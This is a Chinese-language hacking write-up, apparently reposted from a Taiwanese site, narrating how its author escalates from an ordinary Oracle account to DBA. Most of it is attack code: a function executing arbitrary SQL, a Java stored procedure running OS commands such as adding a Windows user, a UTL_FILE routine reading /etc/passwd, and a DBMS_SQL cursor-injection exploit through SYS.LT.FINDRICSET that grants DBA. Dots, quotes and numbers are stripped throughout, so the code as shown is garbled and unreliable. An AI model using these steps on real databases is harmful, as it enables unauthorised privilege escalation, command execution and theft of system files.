很快便連接上oracle服務器此時發現
連接後不是dba權限
不能利用SYSDBMS_EXPORT_EXTENSIONGET_DOMAIN_INDEX_TABLES漏洞提升權限
運行SELECT UTL_HTTPrequest() FROM dual 後發現oracle服務器不能連接網絡
幸運的是
運行
create or replace function Linx_Query (p varchar) return number authid current_user is begin execute immediate p; return ;end;
成功!這個用戶具有create proceduce權限
此時馬上想到創建java擴展執行命令
create or replace and compile java source named LinxUtil as import javaio*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( RuntimegetRuntime()exec(args)getInputStream() ) ); String stempstr=;while ((stemp = myReaderreadLine()) != null) str +=stemp+ ;myReaderclose();return str;} catch (Exception e){return etoString();}}}
begin dbms_javagrant_permission(PUBLIC SYS:javaioFilePermission <> execute );end;
create or replace function LinxRunCMD(p_cmd in varchar) return varchar as language java name LinxUtilrunCMD(javalangString) return String
select * from all_objects where object_name like %LINX%
grant all on LinxRunCMD to public
select LinxRunCMD(cmd /c net user linx /add) from dual
但是在第一步就卡住了服務器由於某種未知原因 不能創建java擴展!!
還好我們還有UTL庫可以利用
create or replace function LinxUTLReadfile (filename varchar) return varchar is
fHandler UTL_FILEFILE_TYPE;
buf varchar();
output varchar();
BEGIN
fHandler := UTL_FILEFOPEN(UTL_FILE_DIR filename r);
loop
begin
utl_fileget_line(fHandlerbuf);
DBMS_OUTPUTPUT_LINE(Cursor: ||buf);
exception
when no_data_found then exit;
end;
output := output||buf||chr();
end loop;
UTL_FILEFCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;
指定目但運行後發現沒有權限只好想辦法提權
***************游標注射***************
老外寫了N個pdf介紹這技術我精簡了代碼
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQLOPEN_CURSOR;
DBMS_SQLPARSE(MYCdeclare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user;commit;end;);
DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);
BEGIN SYSLTFINDRICSET(||dbms_sqlexecute( ||MYC|| )||)–x); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);
WHEN OTHERS THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);
END;
運行後重新連接就有dba權限了簡單吧……
現在可以讀取文件了
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;
select LinxUTLReadfile(passwd) from dual
後面就簡單了不寫了
From:http://tw.wingwit.com/Article/program/Oracle/201311/16747.html
